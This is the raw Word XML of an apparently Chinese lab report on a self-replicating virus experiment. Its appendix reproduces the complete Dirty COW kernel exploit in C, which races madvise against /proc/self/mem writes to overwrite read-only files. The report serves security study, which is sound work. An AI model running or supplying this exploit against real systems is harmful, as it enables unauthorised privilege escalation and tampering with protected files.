        <w:t>、hello world发现已经被感染了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76328599" w14:textId="2E9F180C" w:rsidR="00012898" w:rsidRDefault="00FE547A" w:rsidP="00012898">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6153B48A" wp14:editId="0782590E">
            <wp:extent cx="5267325" cy="1438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65D44" w14:textId="41C2C3F4" w:rsidR="00012898" w:rsidRDefault="00012898" w:rsidP="0001289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然后同样再将新一代病毒复制到新目录下，再次测试其能力，效果良好。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E4389B" w14:textId="58B32700" w:rsidR="00346348" w:rsidRDefault="00A14775" w:rsidP="00012898">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0EF1EE31" wp14:editId="07BC2A65">
            <wp:extent cx="5267325" cy="21717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95C55F8" w14:textId="77777777" w:rsidR="00346348" w:rsidRDefault="00346348"/>
    <w:p w14:paraId="765AE5C1" w14:textId="77777777" w:rsidR="00346348" w:rsidRPr="003A1978" w:rsidRDefault="00346348">
      <w:pPr>
        <w:rPr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1978">
        <w:rPr>
          <w:rFonts w:hint="eastAsia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附录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182D1514" w14:textId="77777777" w:rsidR="00DC777D" w:rsidRDefault="00DC777D"/>
    <w:p w14:paraId="148E4C67" w14:textId="77777777" w:rsidR="00DC777D" w:rsidRPr="003A1978" w:rsidRDefault="0065222C">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A1978">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidRPr="003A1978">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>irty</w:t>
      </w:r>
      <w:r w:rsidRPr="003A1978">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> cow </w:t>
      </w:r>
      <w:r w:rsidRPr="003A1978">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>漏洞攻击代码样例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3215BE5F" w14:textId="77777777" w:rsidR="003A1978" w:rsidRDefault="003A1978"/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DC777D" w14:paraId="5DC38F34" w14:textId="77777777" w:rsidTr="00E83F6C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8296" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="073509C6" w14:textId="77777777" w:rsidR="00DC777D" w:rsidRPr="00E716F7" w:rsidRDefault="00DC777D" w:rsidP="00E83F6C">
            <w:r w:rsidRPr="00E716F7">
              <w:t>void *map;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18C49A71" w14:textId="77777777" w:rsidR="00DC777D" w:rsidRPr="00E716F7" w:rsidRDefault="00DC777D" w:rsidP="00E83F6C">
            <w:r w:rsidRPr="00E716F7">
              <w:t>int f;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4965ACA7" w14:textId="77777777" w:rsidR="00DC777D" w:rsidRPr="00E716F7" w:rsidRDefault="00DC777D" w:rsidP="00E83F6C">
            <w:r w:rsidRPr="00E716F7">
              <w:t>struct stat st;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C9D6712" w14:textId="77777777" w:rsidR="00DC777D" w:rsidRPr="00E716F7" w:rsidRDefault="00DC777D" w:rsidP="00E83F6C">
            <w:r w:rsidRPr="00E716F7">
              <w:t>char *name;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D8806AA" w14:textId="77777777" w:rsidR="00DC777D" w:rsidRPr="00E716F7" w:rsidRDefault="00DC777D" w:rsidP="00E83F6C">
            <w:r w:rsidRPr="00E716F7">
              <w:t>int bSuccess = 0;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06747B88" w14:textId="77777777" w:rsidR="00DC777D" w:rsidRPr="00E716F7" w:rsidRDefault="00DC777D" w:rsidP="00E83F6C"/>
          <w:p w14:paraId="3DB3C6BB" w14:textId="77777777" w:rsidR="00DC777D" w:rsidRPr="00E716F7" w:rsidRDefault="00DC777D" w:rsidP="00E83F6C">
            <w:r w:rsidRPr="00E716F7">
              <w:t>void *madviseThread(void *arg)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34DBC1DC" w14:textId="77777777" w:rsidR="00DC777D" w:rsidRPr="00E716F7" w:rsidRDefault="00DC777D" w:rsidP="00E83F6C">
            <w:r w:rsidRPr="00E716F7">
              <w:t>{</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6DA8EB29" w14:textId="77777777" w:rsidR="00DC777D" w:rsidRPr="00E716F7" w:rsidRDefault="00DC777D" w:rsidP="00E83F6C">
            <w:r w:rsidRPr="00E716F7">
              <w:t xml:space="preserve">    char *str;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="045286B9" w14:textId="77777777" w:rsidR="00DC777D" w:rsidRPr="00E716F7" w:rsidRDefault="00DC777D" w:rsidP="00E83F6C">
            <w:r w:rsidRPr="00E716F7">
              <w:t xml:space="preserve">    str = (char *)arg;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D072060" w14:textId="77777777" w:rsidR="00DC777D" w:rsidRPr="00E716F7" w:rsidRDefault="00DC777D" w:rsidP="00E83F6C">
            <w:r w:rsidRPr="00E716F7">
              <w:t xml:space="preserve">    int f = open(str, O_RDONLY);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4571F36B" w14:textId="77777777" w:rsidR="00DC777D" w:rsidRPr="00E716F7" w:rsidRDefault="00DC777D" w:rsidP="00E83F6C">
            <w:r w:rsidRPr="00E716F7">
              <w:t xml:space="preserve">    int i = 0, c = 0;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F94231E" w14:textId="77777777" w:rsidR="00DC777D" w:rsidRPr="00E716F7" w:rsidRDefault="00DC777D" w:rsidP="00E83F6C">
            <w:r w:rsidRPr="00E716F7">
              <w:t xml:space="preserve">    char buffer1[1024], buffer2[1024];</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3114082C" w14:textId="77777777" w:rsidR="00DC777D" w:rsidRPr="00E716F7" w:rsidRDefault="00DC777D" w:rsidP="00E83F6C">
            <w:r w:rsidRPr="00E716F7">
              <w:t xml:space="preserve">    int size;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="688A4464" w14:textId="77777777" w:rsidR="00DC777D" w:rsidRPr="00E716F7" w:rsidRDefault="00DC777D" w:rsidP="00E83F6C">
            <w:r w:rsidRPr="00E716F7">
              <w:t xml:space="preserve">    lseek(f, 0, SEEK_SET);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B6EAA50" w14:textId="77777777" w:rsidR="00DC777D" w:rsidRPr="00E716F7" w:rsidRDefault="00DC777D" w:rsidP="00E83F6C">
            <w:r w:rsidRPr="00E716F7">
              <w:t xml:space="preserve">    size = read(f, buffer1, sizeof(buffer1));</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F888DCF" w14:textId="77777777" w:rsidR="00DC777D" w:rsidRPr="00E716F7" w:rsidRDefault="00DC777D" w:rsidP="00E83F6C">
            <w:r w:rsidRPr="00E716F7">
              <w:t xml:space="preserve">    while(i &lt; 100000000)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34B53ABB" w14:textId="77777777" w:rsidR="00DC777D" w:rsidRPr="00E716F7" w:rsidRDefault="00DC777D" w:rsidP="00E83F6C">
            <w:r w:rsidRPr="00E716F7">
              <w:t xml:space="preserve">    {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="279AED94" w14:textId="77777777" w:rsidR="00DC777D" w:rsidRPr="00E716F7" w:rsidRDefault="00DC777D" w:rsidP="00E83F6C">
            <w:r w:rsidRPr="00E716F7">
              <w:t xml:space="preserve">        c += madvise(map, 100, MADV_DONTNEED);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D9911D7" w14:textId="77777777" w:rsidR="00DC777D" w:rsidRPr="00E716F7" w:rsidRDefault="00DC777D" w:rsidP="00E83F6C">
            <w:r w:rsidRPr="00E716F7">
              <w:t xml:space="preserve">        lseek(f, 0, SEEK_SET);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="744E6574" w14:textId="77777777" w:rsidR="00DC777D" w:rsidRPr="00E716F7" w:rsidRDefault="00DC777D" w:rsidP="00E83F6C">
            <w:r w:rsidRPr="00E716F7">
              <w:t xml:space="preserve">        size = read(f, buffer2, sizeof(buffer2));</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E97192F" w14:textId="77777777" w:rsidR="00DC777D" w:rsidRPr="00E716F7" w:rsidRDefault="00DC777D" w:rsidP="00E83F6C">
            <w:r w:rsidRPr="00E716F7">
              <w:t xml:space="preserve">        if(size &gt; 0 &amp;&amp; strcmp(buffer1, buffer2))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05AE1EA2" w14:textId="77777777" w:rsidR="00DC777D" w:rsidRPr="00E716F7" w:rsidRDefault="00DC777D" w:rsidP="00E83F6C">
            <w:r w:rsidRPr="00E716F7">
              <w:t xml:space="preserve">        {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03D9D864" w14:textId="77777777" w:rsidR="00DC777D" w:rsidRPr="00E716F7" w:rsidRDefault="00DC777D" w:rsidP="00E83F6C">
            <w:r w:rsidRPr="00E716F7">
              <w:t xml:space="preserve">            printf("Hack success!\n\n");</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="574F15E5" w14:textId="77777777" w:rsidR="00DC777D" w:rsidRPr="00E716F7" w:rsidRDefault="00DC777D" w:rsidP="00E83F6C">
            <w:r w:rsidRPr="00E716F7">
              <w:t xml:space="preserve">            bSuccess = 1;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1007DA6B" w14:textId="77777777" w:rsidR="00DC777D" w:rsidRPr="00E716F7" w:rsidRDefault="00DC777D" w:rsidP="00E83F6C">
            <w:r w:rsidRPr="00E716F7">
              <w:t xml:space="preserve">            break;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="185307C0" w14:textId="77777777" w:rsidR="00DC777D" w:rsidRPr="00E716F7" w:rsidRDefault="00DC777D" w:rsidP="00E83F6C">
            <w:r w:rsidRPr="00E716F7">
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">        }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="445D122A" w14:textId="77777777" w:rsidR="00DC777D" w:rsidRPr="00E716F7" w:rsidRDefault="00DC777D" w:rsidP="00E83F6C">
            <w:r w:rsidRPr="00E716F7">
              <w:t xml:space="preserve">        i++;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="418E9EB0" w14:textId="77777777" w:rsidR="00DC777D" w:rsidRPr="00E716F7" w:rsidRDefault="00DC777D" w:rsidP="00E83F6C">
            <w:r w:rsidRPr="00E716F7">
              <w:t xml:space="preserve">    }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="176AA014" w14:textId="77777777" w:rsidR="00DC777D" w:rsidRPr="00E716F7" w:rsidRDefault="00DC777D" w:rsidP="00E83F6C">
            <w:r w:rsidRPr="00E716F7">
              <w:t xml:space="preserve">    close(f);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="708BE672" w14:textId="77777777" w:rsidR="00DC777D" w:rsidRPr="00E716F7" w:rsidRDefault="00DC777D" w:rsidP="00E83F6C">
            <w:r w:rsidRPr="00E716F7">
              <w:t xml:space="preserve">    printf("madvise %d\n\n", c);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="421492AF" w14:textId="77777777" w:rsidR="00DC777D" w:rsidRPr="00E716F7" w:rsidRDefault="00DC777D" w:rsidP="00E83F6C">
            <w:r w:rsidRPr="00E716F7">
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A4C1360" w14:textId="77777777" w:rsidR="00DC777D" w:rsidRPr="00E716F7" w:rsidRDefault="00DC777D" w:rsidP="00E83F6C"/>
          <w:p w14:paraId="43900E82" w14:textId="77777777" w:rsidR="00DC777D" w:rsidRPr="00E716F7" w:rsidRDefault="00DC777D" w:rsidP="00E83F6C">
            <w:r w:rsidRPr="00E716F7">
              <w:t>void *procselfmemThread(void *arg)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="088979C1" w14:textId="77777777" w:rsidR="00DC777D" w:rsidRPr="00E716F7" w:rsidRDefault="00DC777D" w:rsidP="00E83F6C">
            <w:r w:rsidRPr="00E716F7">
              <w:t>{</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D10A381" w14:textId="77777777" w:rsidR="00DC777D" w:rsidRPr="00E716F7" w:rsidRDefault="00DC777D" w:rsidP="00E83F6C">
            <w:r w:rsidRPr="00E716F7">
              <w:t xml:space="preserve">    char *str;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="225D3CCB" w14:textId="77777777" w:rsidR="00DC777D" w:rsidRPr="00E716F7" w:rsidRDefault="00DC777D" w:rsidP="00E83F6C">
            <w:r w:rsidRPr="00E716F7">
              <w:t xml:space="preserve">    str = (char *)arg;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6DF202AC" w14:textId="77777777" w:rsidR="00DC777D" w:rsidRPr="00E716F7" w:rsidRDefault="00DC777D" w:rsidP="00E83F6C"/>
          <w:p w14:paraId="785D72E6" w14:textId="77777777" w:rsidR="00DC777D" w:rsidRPr="00E716F7" w:rsidRDefault="00DC777D" w:rsidP="00E83F6C">
            <w:r w:rsidRPr="00E716F7">
              <w:t xml:space="preserve">    int f = open("/proc/self/mem", O_RDWR);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="340DC97B" w14:textId="77777777" w:rsidR="00DC777D" w:rsidRPr="00E716F7" w:rsidRDefault="00DC777D" w:rsidP="00E83F6C">
            <w:r w:rsidRPr="00E716F7">
              <w:t xml:space="preserve">    int i = 0, c = 0;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0FF74B21" w14:textId="77777777" w:rsidR="00DC777D" w:rsidRPr="00E716F7" w:rsidRDefault="00DC777D" w:rsidP="00E83F6C">
            <w:r w:rsidRPr="00E716F7">
              <w:t xml:space="preserve">    while(i &lt; 100000000 &amp;&amp; !bSuccess)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D09E37E" w14:textId="77777777" w:rsidR="00DC777D" w:rsidRPr="00E716F7" w:rsidRDefault="00DC777D" w:rsidP="00E83F6C">
            <w:r w:rsidRPr="00E716F7">
              <w:t xml:space="preserve">    {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F691C96" w14:textId="77777777" w:rsidR="00DC777D" w:rsidRPr="00E716F7" w:rsidRDefault="00DC777D" w:rsidP="00E83F6C">
            <w:r w:rsidRPr="00E716F7">
              <w:t xml:space="preserve">        lseek(f, (uintptr_t)map, SEEK_SET);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E7A68BB" w14:textId="77777777" w:rsidR="00DC777D" w:rsidRPr="00E716F7" w:rsidRDefault="00DC777D" w:rsidP="00E83F6C">
            <w:r w:rsidRPr="00E716F7">
              <w:t xml:space="preserve">        c += write(f, str, strlen(str));</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5910974A" w14:textId="77777777" w:rsidR="00DC777D" w:rsidRPr="00E716F7" w:rsidRDefault="00DC777D" w:rsidP="00E83F6C">
            <w:r w:rsidRPr="00E716F7">
              <w:t xml:space="preserve">        i++;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C88C50D" w14:textId="77777777" w:rsidR="00DC777D" w:rsidRPr="00E716F7" w:rsidRDefault="00DC777D" w:rsidP="00E83F6C">
            <w:r w:rsidRPr="00E716F7">
              <w:t xml:space="preserve">    }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="55FC7563" w14:textId="77777777" w:rsidR="00DC777D" w:rsidRPr="00E716F7" w:rsidRDefault="00DC777D" w:rsidP="00E83F6C">
            <w:r w:rsidRPr="00E716F7">
              <w:t xml:space="preserve">    close(f);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="513045EF" w14:textId="77777777" w:rsidR="00DC777D" w:rsidRPr="00E716F7" w:rsidRDefault="00DC777D" w:rsidP="00E83F6C">
            <w:r w:rsidRPr="00E716F7">
              <w:t xml:space="preserve">    printf("procselfmem %d \n\n", c);    </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43F7BC0A" w14:textId="77777777" w:rsidR="00DC777D" w:rsidRPr="00E716F7" w:rsidRDefault="00DC777D" w:rsidP="00E83F6C">
            <w:r w:rsidRPr="00E716F7">
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11F599C9" w14:textId="77777777" w:rsidR="00DC777D" w:rsidRPr="00E716F7" w:rsidRDefault="00DC777D" w:rsidP="00E83F6C"/>
          <w:p w14:paraId="161978CE" w14:textId="77777777" w:rsidR="00DC777D" w:rsidRPr="00E716F7" w:rsidRDefault="00DC777D" w:rsidP="00E83F6C">
            <w:r w:rsidRPr="00E716F7">
              <w:t>int main(int argc, char *argv[])</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A3C46EF" w14:textId="77777777" w:rsidR="00DC777D" w:rsidRPr="00E716F7" w:rsidRDefault="00DC777D" w:rsidP="00E83F6C">
            <w:r w:rsidRPr="00E716F7">
              <w:t>{</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="257A1F55" w14:textId="77777777" w:rsidR="00DC777D" w:rsidRPr="00E716F7" w:rsidRDefault="00DC777D" w:rsidP="00E83F6C">
            <w:r w:rsidRPr="00E716F7">
              <w:t xml:space="preserve">    if(argc &lt; 3)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5910D7EB" w14:textId="77777777" w:rsidR="00DC777D" w:rsidRPr="00E716F7" w:rsidRDefault="00DC777D" w:rsidP="00E83F6C">
            <w:r w:rsidRPr="00E716F7">
              <w:t xml:space="preserve">    {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76383C9E" w14:textId="77777777" w:rsidR="00DC777D" w:rsidRPr="00E716F7" w:rsidRDefault="00DC777D" w:rsidP="00E83F6C">
            <w:r w:rsidRPr="00E716F7">
              <w:t xml:space="preserve">        (void)fprintf(stderr, "%s\n", "usage: dirtycow target_file new_content");</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="667A68F7" w14:textId="77777777" w:rsidR="00DC777D" w:rsidRPr="00E716F7" w:rsidRDefault="00DC777D" w:rsidP="00E83F6C">
            <w:r w:rsidRPr="00E716F7">
              <w:t xml:space="preserve">        return 1;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0119B768" w14:textId="77777777" w:rsidR="00DC777D" w:rsidRPr="00E716F7" w:rsidRDefault="00DC777D" w:rsidP="00E83F6C">
            <w:r w:rsidRPr="00E716F7">
              <w:t xml:space="preserve">    }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="529DC4EE" w14:textId="77777777" w:rsidR="00DC777D" w:rsidRPr="00E716F7" w:rsidRDefault="00DC777D" w:rsidP="00E83F6C">
            <w:r w:rsidRPr="00E716F7">
              <w:t xml:space="preserve">    pthread_t pth1, pth2;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0998C87D" w14:textId="77777777" w:rsidR="00DC777D" w:rsidRPr="00E716F7" w:rsidRDefault="00DC777D" w:rsidP="00E83F6C"/>
          <w:p w14:paraId="4550232D" w14:textId="77777777" w:rsidR="00DC777D" w:rsidRPr="00E716F7" w:rsidRDefault="00DC777D" w:rsidP="00E83F6C">
            <w:r w:rsidRPr="00E716F7">
              <w:t xml:space="preserve">    f = open(argv[1], O_RDONLY);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E623EEE" w14:textId="77777777" w:rsidR="00DC777D" w:rsidRPr="00E716F7" w:rsidRDefault="00DC777D" w:rsidP="00E83F6C">
            <w:r w:rsidRPr="00E716F7">
              <w:t xml:space="preserve">    fstat(f, &amp;st);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A14F22D" w14:textId="77777777" w:rsidR="00DC777D" w:rsidRPr="00E716F7" w:rsidRDefault="00DC777D" w:rsidP="00E83F6C">
            <w:r w:rsidRPr="00E716F7">
              <w:t xml:space="preserve">    name = argv[1];</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="609B6749" w14:textId="77777777" w:rsidR="00DC777D" w:rsidRPr="00E716F7" w:rsidRDefault="00DC777D" w:rsidP="00E83F6C"/>
          <w:p w14:paraId="44D64B8A" w14:textId="77777777" w:rsidR="00DC777D" w:rsidRPr="00E716F7" w:rsidRDefault="00DC777D" w:rsidP="00E83F6C">
            <w:r w:rsidRPr="00E716F7">
              <w:t xml:space="preserve">    map = mmap(NULL, st.st_size, PROT_READ, MAP_PRIVATE, f, 0);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C1CB5D0" w14:textId="77777777" w:rsidR="00DC777D" w:rsidRPr="00E716F7" w:rsidRDefault="00DC777D" w:rsidP="00E83F6C">
            <w:r w:rsidRPr="00E716F7">
              <w:t xml:space="preserve">    printf("mmap %zx\n\n", (uintptr_t)map);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2477CDBF" w14:textId="77777777" w:rsidR="00DC777D" w:rsidRPr="00E716F7" w:rsidRDefault="00DC777D" w:rsidP="00E83F6C"/>
          <w:p w14:paraId="231CE27E" w14:textId="77777777" w:rsidR="00DC777D" w:rsidRPr="00E716F7" w:rsidRDefault="00DC777D" w:rsidP="00E83F6C">
            <w:r w:rsidRPr="00E716F7">
              <w:t xml:space="preserve">    pthread_create(&amp;pth1, NULL, madviseThread, argv[1]);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2629C7E7" w14:textId="77777777" w:rsidR="00DC777D" w:rsidRPr="00E716F7" w:rsidRDefault="00DC777D" w:rsidP="00E83F6C">
            <w:r w:rsidRPr="00E716F7">
              <w:t xml:space="preserve">    pthread_create(&amp;pth2, NULL, procselfmemThread, argv[2]);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2BE6B160" w14:textId="77777777" w:rsidR="00DC777D" w:rsidRPr="00E716F7" w:rsidRDefault="00DC777D" w:rsidP="00E83F6C"/>
          <w:p w14:paraId="4C2F7C27" w14:textId="77777777" w:rsidR="00DC777D" w:rsidRPr="00E716F7" w:rsidRDefault="00DC777D" w:rsidP="00E83F6C">
            <w:r w:rsidRPr="00E716F7">
              <w:t xml:space="preserve">    pthread_join(pth1, NULL);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54BABA8F" w14:textId="77777777" w:rsidR="00DC777D" w:rsidRPr="00E716F7" w:rsidRDefault="00DC777D" w:rsidP="00E83F6C">
            <w:r w:rsidRPr="00E716F7">
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">    pthread_join(pth2, NULL);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A93EA5A" w14:textId="77777777" w:rsidR="00DC777D" w:rsidRPr="00E716F7" w:rsidRDefault="00DC777D" w:rsidP="00E83F6C"/>
          <w:p w14:paraId="37922F79" w14:textId="77777777" w:rsidR="00DC777D" w:rsidRPr="00E716F7" w:rsidRDefault="00DC777D" w:rsidP="00E83F6C">
            <w:r w:rsidRPr="00E716F7">
              <w:t xml:space="preserve">    close(f);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E34184F" w14:textId="77777777" w:rsidR="00DC777D" w:rsidRPr="00E716F7" w:rsidRDefault="00DC777D" w:rsidP="00E83F6C"/>
          <w:p w14:paraId="2F95895C" w14:textId="77777777" w:rsidR="00DC777D" w:rsidRPr="00E716F7" w:rsidRDefault="00DC777D" w:rsidP="00E83F6C">
            <w:r w:rsidRPr="00E716F7">
              <w:t xml:space="preserve">    return 0;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16C34F3D" w14:textId="77777777" w:rsidR="00DC777D" w:rsidRDefault="00DC777D" w:rsidP="00E83F6C">
            <w:r w:rsidRPr="00E716F7">
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3259B900" w14:textId="77777777" w:rsidR="00DC777D" w:rsidRPr="00EF66D6" w:rsidRDefault="00DC777D"/>
    <w:sectPr w:rsidR="00DC777D" w:rsidRPr="00EF66D6" w:rsidSect="00BA4345">
      <w:footerReference w:type="default" r:id="rId1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09D7E" w14:textId="77777777" w:rsidR="008060A8" w:rsidRDefault="008060A8" w:rsidP="003B4551">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="65999107" w14:textId="77777777" w:rsidR="008060A8" w:rsidRDefault="008060A8" w:rsidP="003B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0797670"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtEndPr/>
    <w:sdtContent>
      <w:p w14:paraId="671F75EA" w14:textId="77777777" w:rsidR="00460500" w:rsidRDefault="00460500">
        <w:pPr>
          <w:pStyle w:val="a9"/>
          <w:jc w:val="center"/>
        </w:pPr>
        <w:r>
          <w:t>2</w:t>
        </w:r>
      </w:p>
    </w:sdtContent>
  </w:sdt>
  <w:p w14:paraId="3CFB7BF5" w14:textId="77777777" w:rsidR="00460500" w:rsidRDefault="004605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3D7DB" w14:textId="77777777" w:rsidR="008060A8" w:rsidRDefault="008060A8" w:rsidP="003B4551">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="555A3EB2" w14:textId="77777777" w:rsidR="008060A8" w:rsidRDefault="008060A8" w:rsidP="003B4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12439"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="834219A4"/>
    <w:lvl w:ilvl="0" w:tplc="0A8AC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D918AF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9A7AA5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DB091A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F306DDE4"/>
    <w:lvl w:ilvl="0" w:tplc="1DC438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2A7132B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CD40A4EC"/>
    <w:lvl w:ilvl="0" w:tplc="9DD0A6E2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4" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="273D1211"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C2AAA1E8"/>
    <w:lvl w:ilvl="0" w:tplc="F9BA0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B927E3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C862DC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31E7594"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FD3A3988"/>
    <w:lvl w:ilvl="0" w:tplc="A71E99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11929EA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B906CE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1371D2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="567662AC"/>
    <w:lvl w:ilvl="0" w:tplc="11A06B6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DB96475"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="33801722"/>
    <w:lvl w:ilvl="0" w:tplc="D3BA2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C18"/>
    <w:rsid w:val="00012898"/>
    <w:rsid w:val="00012F69"/>
    <w:rsid w:val="00027773"/>
    <w:rsid w:val="00044A05"/>
    <w:rsid w:val="000A47A3"/>
    <w:rsid w:val="001601AB"/>
    <w:rsid w:val="00172586"/>
    <w:rsid w:val="001944F9"/>
    <w:rsid w:val="001C7A47"/>
    <w:rsid w:val="001E6AA1"/>
    <w:rsid w:val="00207608"/>
    <w:rsid w:val="00274950"/>
    <w:rsid w:val="00286FCB"/>
    <w:rsid w:val="002A68F8"/>
    <w:rsid w:val="002B321A"/>
    <w:rsid w:val="002B57E0"/>
    <w:rsid w:val="002D68C6"/>
    <w:rsid w:val="002F33C7"/>
    <w:rsid w:val="00334E82"/>
    <w:rsid w:val="003411F8"/>
    <w:rsid w:val="00346348"/>
    <w:rsid w:val="00370DDD"/>
    <w:rsid w:val="00381061"/>
    <w:rsid w:val="00382454"/>
    <w:rsid w:val="00387B14"/>
    <w:rsid w:val="003A089F"/>
    <w:rsid w:val="003A1978"/>
    <w:rsid w:val="003B4551"/>
    <w:rsid w:val="003C4919"/>
    <w:rsid w:val="003E18EF"/>
    <w:rsid w:val="00460500"/>
    <w:rsid w:val="00493E7F"/>
    <w:rsid w:val="004F4890"/>
    <w:rsid w:val="004F6F46"/>
    <w:rsid w:val="005022D8"/>
    <w:rsid w:val="005103A4"/>
    <w:rsid w:val="0052188B"/>
    <w:rsid w:val="00573582"/>
    <w:rsid w:val="005A6F88"/>
    <w:rsid w:val="00602760"/>
    <w:rsid w:val="00605CAC"/>
    <w:rsid w:val="00617345"/>
    <w:rsid w:val="00621A92"/>
    <w:rsid w:val="00625C66"/>
    <w:rsid w:val="0065222C"/>
    <w:rsid w:val="0066557D"/>
    <w:rsid w:val="006C25BA"/>
    <w:rsid w:val="006E318C"/>
    <w:rsid w:val="00726291"/>
    <w:rsid w:val="00756469"/>
    <w:rsid w:val="00785E1C"/>
    <w:rsid w:val="007D2564"/>
